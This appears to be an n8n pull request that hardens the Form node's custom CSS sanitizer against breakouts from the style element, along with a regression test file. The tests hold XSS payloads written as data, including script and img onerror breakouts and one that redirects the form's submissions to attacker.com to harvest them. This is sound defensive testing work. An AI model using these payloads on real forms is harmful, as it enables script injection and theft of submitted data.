### PR TITLE
fix(Form Node): Improve custom CSS sanitization

### DIFF
--- a/packages/nodes-base/nodes/Form/test/sanitizeCustomCss.test.ts
+++ b/packages/nodes-base/nodes/Form/test/sanitizeCustomCss.test.ts
@@ -1,0 +1,150 @@
+/**
+ * Tests for sanitizeCustomCss — ensures custom CSS is sanitized
+ * so it cannot break out of the <style> rendering context.
+ */
+
+import { sanitizeCustomCss } from '../utils/utils';
+
+describe('sanitizeCustomCss — security', () => {
+	describe('entity-encoded markup is neutralized', () => {
+		it('should not produce executable tags from encoded input', () => {
+			const input =
+				'body { color: red; }}&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;style&gt;{';
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style>');
+			expect(result).not.toContain('<script>');
+			expect(result).not.toContain('</script>');
+		});
+
+		it('should not produce img tags from encoded input', () => {
+			const input =
+				'body { color: blue; }}&lt;/style&gt;&lt;img src=x onerror=alert(document.domain)&gt;&lt;style&gt;{';
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style>');
+			expect(result).not.toContain('<img');
+		});
+
+		it('should not produce script tags from multi-line encoded input', () => {
+			const input = `body { color: red; }
+}&lt;/style&gt;&lt;script&gt;document.addEventListener("DOMContentLoaded",function(){var f=document.getElementById("n8n-form");if(f){f.action="https://attacker.com/harvest"}})&lt;/script&gt;&lt;style&gt;{`;
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style>');
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('mixed safe and encoded content', () => {
+		it('should preserve safe CSS child combinator while rejecting encoded markup', () => {
+			const input = '#n8n-form > div { color: red; }';
+			const result = sanitizeCustomCss(input);
+
+			expect(result).toBe(input);
+			expect(result).toContain('>');
+		});
+
+		it('should keep safe selectors and strip encoded markup', () => {
+			const input = '.container > p { color: red; }&lt;script&gt;alert(1)&lt;/script&gt;';
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).toContain('.container > p');
+			expect(result).not.toContain('<script>');
+		});
+
+		it('should handle multiple encoded closing patterns', () => {
+			const input =
+				'}&lt;/style&gt;&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;style&gt;&lt;style&gt;{';
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style>');
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('encoded markup inside CSS values', () => {
+		it('should not allow encoded markup inside url()', () => {
+			const input =
+				".bg { background-image: url('}&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;style&gt;{'); }";
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style><script>');
+		});
+
+		it('should not allow encoded markup inside data URIs', () => {
+			const input =
+				"body { background: url('data:image/svg+xml,}&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;style&gt;{'); }";
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style><script>');
+		});
+	});
+
+	describe('legitimate CSS is preserved', () => {
+		it('should preserve CSS with > selectors', () => {
+			const input = '#n8n-form > div.form-header > p { text-align: left; }';
+			const result = sanitizeCustomCss(input);
+
+			expect(result).toBe(input);
+		});
+
+		it('should preserve CSS with & in property values', () => {
+			const input = '.class { content: "Q&A"; }';
+			const result = sanitizeCustomCss(input);
+
+			expect(result).toContain('Q&A');
+		});
+
+		it('should preserve complex CSS with multiple selectors', () => {
+			const input = `
+				#n8n-form > div.form-header > p { text-align: left; }
+				.form-container > .input-group + .input-group { margin-top: 1rem; }
+				button:hover { background-color: #0056b3; }
+			`;
+			const result = sanitizeCustomCss(input);
+
+			expect(result).toBe(input);
+		});
+	});
+
+	describe('defense in depth', () => {
+		it('should strip direct (non-encoded) closing style tags', () => {
+			const input = '}</style><div>injected content</div><style>{';
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('</style>');
+		});
+
+		it('should not cascade-decode double-encoded entities', () => {
+			const input = 'body{color:red;}&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;';
+
+			const result = sanitizeCustomCss(input);
+
+			expect(result).not.toContain('<script>');
+			expect(result).not.toContain('&lt;script');
+		});
+	});
+
+	describe('output is safe in style rendering context', () => {
+		it('should produce safe output when placed inside a style element', () => {
+			const input =
+				'body{color:red;}&lt;/style&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;style&gt;';
+
+			const sanitized = sanitizeCustomCss(input);
+
+			const rendered = `<style>${sanitized}</style>`;
+
+			expect(rendered).not.toContain('</style><script>');
+			expect(rendered).not.toContain('onerror');
+		});
+	});
+});

--- a/packages/nodes-base/nodes/Form/utils/utils.ts
+++ b/packages/nodes-base/nodes/Form/utils/utils.ts
@@ -133,13 +133,17 @@ export const prepareFormFields = (fields: FormFieldsParameter) => {
 export function sanitizeCustomCss(css: string | undefined): string | undefined {
 	if (!css) return undefined;
 
-	// Use sanitize-html with custom settings for CSS
-	return sanitize(css, {
-		allowedTags: [], // No HTML tags allowed
-		allowedAttributes: {}, // No attributes allowed
-		// Decode HTML entities that sanitize-html encodes, as they break CSS selectors like ">"
-		textFilter: (text) => text.replace(/&gt;/g, '>').replace(/&lt;/g, '<').replace(/&amp;/g, '&'),
+	const sanitized = sanitize(css, {
+		allowedTags: [],
+		allowedAttributes: {},
 	});
+
+	// Restore only the entities needed for valid CSS after tag stripping.
+	// &gt; → > is needed for CSS child combinator selectors (div > p).
+	// &amp; → & is needed for CSS values, but NOT when followed by lt;/gt;/amp;
+	// to prevent cascading decode of double-encoded entities.
+	// &lt; is never decoded — < is not valid in CSS and would enable tag injection.
+	return sanitized.replace(/&gt;/g, '>').replace(/&amp;(?!(?:lt|gt|amp);)/g, '&');
 }
 
 /**


### PR DESCRIPTION
## Summary

Hardens the `sanitizeCustomCss` function to prevent style-context breakout when rendering user-provided CSS in form templates.

**Changes:**
- Remove the `textFilter` callback that decoded all HTML entities after tag stripping
- Selectively restore only `>` and `&` post-sanitization (needed for CSS child combinators and values), with a negative lookahead to prevent cascading decode of double-encoded entities
- `<` is never decoded — it is not used in valid CSS
- Add 14 comprehensive regression tests for CSS sanitization

**How to test:**
1. Create a Form Trigger workflow with custom CSS styling containing CSS child selectors (e.g., `div > p { color: red; }`) — verify styling applies correctly
2. Run the new test suite: `cd packages/nodes-base && pnpm test sanitizeCustomCss.test`

## Related Linear tickets, Github issues, and Community forum posts

https://linear.app/n8n/issue/NODE-4552

## Review / Merge checklist

- [x] PR title and summary are descriptive. ([conventions](../blob/master/.github/pull_request_title_conventions.md))
- [ ] [Docs updated](https://github.com/n8n-io/n8n-docs) or follow-up ticket created.
- [x] Tests included.
- [ ] PR Labeled with `release/backport` (if the PR is an urgent fix that needs to be backported)